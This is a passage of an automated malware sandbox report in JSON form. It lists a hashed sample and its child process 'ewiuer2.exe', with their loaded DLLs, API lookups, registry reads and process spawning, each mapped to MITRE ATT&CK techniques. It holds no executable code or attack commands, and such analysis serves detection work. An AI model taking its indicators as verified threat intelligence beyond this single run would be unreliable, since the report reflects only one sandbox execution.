loaded module \"ADVAPI32.DLL\" at base 75c90000\n \"ewiuer2.exe\" loaded module \"URLMON.DLL\" at base 760f0000\n \"ewiuer2.exe\" loaded module \"SECUR32.DLL\" at base 74ff0000\n \"ewiuer2.exe\" loaded module \"OLEAUT32.DLL\" at base 75fb0000\n \"ewiuer2.exe\" loaded module \"CRYPTBASE.DLL\" at base 75240000\n \"ewiuer2.exe\" loaded module \"CLBCATQ.DLL\" at base 75ba0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6d220000\n \"ewiuer2.exe\" loaded module \"OLE32.DLL\" at base 77250000\n \"ewiuer2.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73390000\n \"ewiuer2.exe\" loaded module \"DHCPCSVC.DLL\" at base 73370000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 747e0000\n \"ewiuer2.exe\" loaded module \"RASADHLP.DLL\" at base 71380000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77500000\n \"ewiuer2.exe\" loaded module \"CRYPTSP.DLL\" at base 74cc0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a50000\n \"ewiuer2.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75250000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6c240000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 75fb0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 755f0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73430000\n \"ewiuer2.exe\" loaded module \"COMCTL32.DLL\" at base 74180000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 75b60000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75160000\n \"ewiuer2.exe\" loaded module \"SHELL32.DLL\" at base 76310000\n \"ewiuer2.exe\" loaded module \"KERNEL32.DLL\" at base 758a0000\n \"ewiuer2.exe\" loaded module \"PROFAPI.DLL\" at base 752c0000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 711a0000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 755a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005716)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771A0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 771A0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"ewiuer2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"ewiuer2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"ewiuer2.exe\" (UID: 00000000-00005912)\n Spawned process \"ewiuer2.exe\" (UID: 00000000-00006088)\n Spawned process \"ewiuer2.exe\" with commandline \"/nomove\" (UID: 00000000-00003644)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"ewiuer2.exe\" (UID: 00000000-00005912)\n Spawned process \"ewiuer2.exe\" (UID: 00000000-00006088)\n Spawned process \"ewiuer2.exe\" with commandline \"/nomove\" (UID: 00000000-00003644)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"ewiuer2.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"ewiuer2.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"EWIUER2.EXE.67A4889D.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"EWIUER2.EXE.67A4889D.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005716)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DnsGetProxyInformation (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00006088)\n \"ewiuer2.exe\" called 